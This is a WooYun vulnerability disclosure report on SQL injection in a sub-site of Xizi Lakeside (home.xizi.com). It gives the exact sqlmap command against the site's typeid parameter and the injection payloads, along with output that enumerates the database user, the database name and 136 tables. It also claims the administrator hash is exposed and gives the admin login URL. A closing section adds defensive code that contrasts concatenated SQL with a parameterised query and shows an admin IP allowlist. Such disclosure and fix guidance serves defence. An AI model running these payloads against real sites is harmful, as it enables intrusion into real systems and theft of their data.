
Vulnerability summary

Defect ID: wooyun-2013-045286

Title: 西子湖畔 (Xizi Lakeside) # a sub-site has an SQL injection leading to information disclosure

Vendor: bbs.xizi.com

Author: Mr.leo

Submitted: 2013-12-17 17:40

Fix deadline: 2014-01-31 17:41

Published: 2014-01-31 17:41

Vulnerability type: SQL injection

Severity: Medium

Self-rated Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-12-17: Details sent to the vendor, awaiting vendor handling
2013-12-17: Vendor confirmed; details disclosed to the vendor only
2013-12-27: Details disclosed to core white hats and domain experts
2014-01-06: Details disclosed to regular white hats
2014-01-16: Details disclosed to intern white hats
2014-01-31: Details disclosed to the public

Brief description:

A 西子湖畔 (Xizi Lakeside) sub-site has an SQL injection leading to information disclosure.

Details:

Site:
http://home.xizi.com
Two parameters are injectable, case_id and typeid; typeid is used as the example below.
sqlmap.py -u "http://home.xizi.com/index.php?a=lists_type&c=index&m=content&typeid=63" -p "typeid" --dbs --current-user --current-db
Running sqlmap:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: typeid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: a=lists_type&c=index&m=content&typeid=63 AND 2469=2469
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: a=lists_type&c=index&m=content&typeid=63 AND (SELECT 1399 FROM(SELECT COUNT(*),CONCAT(0x3a6c75743a,(SELECT (CASE WHEN (1399=1399) THEN 1 ELSE 0 END)),0x3a786a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: a=lists_type&c=index&m=content&typeid=63 AND SLEEP(5)
---
[09:05:33] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[09:05:33] [INFO] fetching current user
[09:05:33] [INFO] resumed: [email protected]%
current user: '[email protected]%'
[09:05:33] [INFO] fetching current database
[09:05:33] [INFO] resumed: home2013
current database: 'home2013'
[09:05:33] [INFO] fetching database names
[09:05:33] [INFO] the SQL query used returns 2 entries
[09:05:33] [INFO] resumed: information_schema
[09:05:33] [INFO] resumed: home2013
available databases [2]:
[*] home2013
[*] information_schema
Database: home2013
[136 tables]
+--------------------------+
| v9_activity_data |
| v9_activity_subject |
| v9_admin |
| v9_admin_panel |
| v9_admin_role |
| v9_admin_role_priv |
| v9_announce |
| v9_attachment |
| v9_attachment_index |
| v9_badword |
| v9_bid |
| v9_bid_log |
| v9_bid_relationship |
| v9_block |
| v9_block_history |
| v9_block_priv |
| v9_cache |
| v9_case |
| v9_casepic |
| v9_category |
| v9_category_priv |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node |
| v9_collection_program |
| v9_comment |
| v9_comment_check |
| v9_comment_data_1 |
| v9_comment_setting |
| v9_comment_table |
| v9_company |
| v9_content_check |
| v9_copyfrom |
| v9_datacall |
| v9_dbsource |
| v9_download |
| v9_download_data |
| v9_downservers |
| v9_extend_setting |
| v9_favorite |
| v9_hits |
| v9_ipbanned |
| v9_keylink |
| v9_keyword |
| v9_keyword_data |
| v9_link |
| v9_linkage |
| v9_log |
| v9_member |
| v9_member_convert_detail |
| v9_member_detail |
| v9_member_group |
| v9_member_menu |
| v9_member_verify |
| v9_member_vip |
| v9_menu |
| v9_message |
| v9_message_data |
| v9_message_group |
| v9_model |
| v9_model_field |
| v9_module |
| v9_mood |
| v9_news |
| v9_news_data |
| v9_page |
| v9_pay_account |
| v9_pay_payment |
| v9_pay_spend |
| v9_picture |
| v9_picture_data |
| v9_position |
| v9_position_data |
| v9_poster |
| v9_poster_201105 |
| v9_poster_201106 |
| v9_poster_201107 |
| v9_poster_201108 |
| v9_poster_201109 |
| v9_poster_201112 |
| v9_poster_201201 |
| v9_poster_201202 |
| v9_poster_201203 |
| v9_poster_201204 |
| v9_poster_201205 |
| v9_poster_201206 |
| v9_poster_201207 |
| v9_poster_201208 |
| v9_poster_201209 |
| v9_poster_201210 |
| v9_poster_201211 |
| v9_poster_201212 |
| v9_poster_201301 |
| v9_poster_201302 |
| v9_poster_201303 |
| v9_poster_201305 |
| v9_poster_201306 |
| v9_poster_201307 |
| v9_poster_201308 |
| v9_poster_201309 |
| v9_poster_201310 |
| v9_poster_201311 |
| v9_poster_201312 |
| v9_poster_space |
| v9_queue |
| v9_release_point |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_site |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sso_admin |
| v9_sso_applications |
| v9_sso_members |
| v9_sso_messagequeue |
| v9_sso_session |
| v9_sso_settings |
| v9_state |
| v9_tag |
| v9_template_bak |
| v9_times |
| v9_type |
| v9_urlrule |
| v9_video |
| v9_video_content |
| v9_video_data |
| v9_vote_data |
| v9_vote_option |
| v9_vote_subject |
| v9_wap |
| v9_wap_type |
| v9_workflow |
| v9_xz_data_record |
+--------------------------+

[screenshot: 123.png]


The administrator username and password hash are exposed.

[screenshot: 456.png]


over
The admin backend address is easy to find as well, isn't it?
http://home.xizi.com/index.php?m=admin&c=index&a=login&pc_hash=

Proof of vulnerability:

Database: home2013
[136 tables] (the same table listing as shown in the details section above)
The admin backend address is easy to find as well, isn't it?

[screenshot: 678.png]

Fix recommendations:

1# Fix every parameter that can be injected
2# Block external access to the admin backend
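The two fix items above, worked through as an added example that is not part of the original report and not the affected site's code. It uses an in-memory SQLite database as a stand-in for the real MySQL backend; the `v9_type` table, its columns, the sample rows and the admin IP allowlist are all constructed for this demo (the page shows only table names, not their schema). A vulnerable `lists_type` handler that concatenates `typeid` into SQL sits next to a hardened one that validates the type and binds the value; `boolean_blind_differential` checks whether the TRUE/FALSE tautology pair that sqlmap reported above still produces different output, i.e. whether the boolean-based blind oracle survives the fix.

```python
"""Added example: vulnerable vs. hardened handling of an integer query-string
parameter, plus an allowlist gate for the admin backend.

Assumptions (constructed for this demo, not from the affected site):
- table `v9_type(typeid INTEGER, name TEXT)` with three rows
- admin backend reachable only from the 10.0.0.0/8 range
"""
import ipaddress
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data standing in for whatever the real typeid lookup queried.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE v9_type (typeid INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO v9_type VALUES (?, ?)",
        [(62, "notice"), (63, "news"), (64, "events")],
    )
    return conn


def lists_type_vulnerable(conn: sqlite3.Connection, typeid: str) -> list:
    # The defect: the raw query-string value is concatenated into the SQL text,
    # so "63 AND 2469=2469" becomes part of the WHERE clause and the attacker
    # controls a boolean the database evaluates.
    sql = "SELECT name FROM v9_type WHERE typeid=" + typeid
    return [row[0] for row in conn.execute(sql)]


def lists_type_fixed(conn: sqlite3.Connection, typeid: str) -> list:
    # Fix 1a: enforce the expected type. typeid is a numeric identifier, so
    # anything that is not a plain non-negative integer is rejected up front.
    if not typeid.isdigit():
        raise ValueError("typeid must be a non-negative integer")
    # Fix 1b: bind the value as a query parameter so it can only ever be data,
    # never SQL syntax, even if the type check above were loosened later.
    sql = "SELECT name FROM v9_type WHERE typeid=?"
    return [row[0] for row in conn.execute(sql, (int(typeid),))]


def boolean_blind_differential(handler, conn: sqlite3.Connection) -> bool:
    """True if a TRUE/FALSE tautology pair changes the handler's output.

    This is the oracle behind the "boolean-based blind" finding in the sqlmap
    output above: the same base value with "AND 2469=2469" appended must give
    a different result from "AND 2469=2468" for the injection to be usable.
    A handler that rejects or neutralises the input has no such differential.
    """
    try:
        true_case = handler(conn, "63 AND 2469=2469")
        false_case = handler(conn, "63 AND 2469=2468")
    except ValueError:
        return False  # input rejected before reaching the database: no oracle
    return true_case != false_case


# Fix 2: the admin backend (index.php?m=admin&...) should not answer to the
# public internet. Constructed allowlist; a real deployment would take this
# from configuration and enforce it at the web server or firewall as well.
ADMIN_ALLOWLIST = [ipaddress.ip_network("10.0.0.0/8")]


def admin_request_allowed(remote_addr: str) -> bool:
    """Return True only if the client address is inside the admin allowlist."""
    try:
        addr = ipaddress.ip_address(remote_addr)
    except ValueError:
        return False  # malformed address: deny by default
    return any(addr in net for net in ADMIN_ALLOWLIST)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler has blind oracle:",
          boolean_blind_differential(lists_type_vulnerable, db))
    print("fixed handler has blind oracle:",
          boolean_blind_differential(lists_type_fixed, db))
    print("admin from 10.1.2.3 allowed:", admin_request_allowed("10.1.2.3"))
    print("admin from 203.0.113.5 allowed:", admin_request_allowed("203.0.113.5"))
```

The type check alone would already stop the payloads shown in the report, but parameter binding is what makes the query safe regardless of how the input is later validated; the two belong together. The same `isdigit` plus bind pattern applies to `case_id`, the other parameter the report names.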

Copyright notice: please credit the source when reposting: Mr.leo@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2013-12-17 17:47

Vendor reply:

Confirmed, fix in progress~

Latest status:

None yet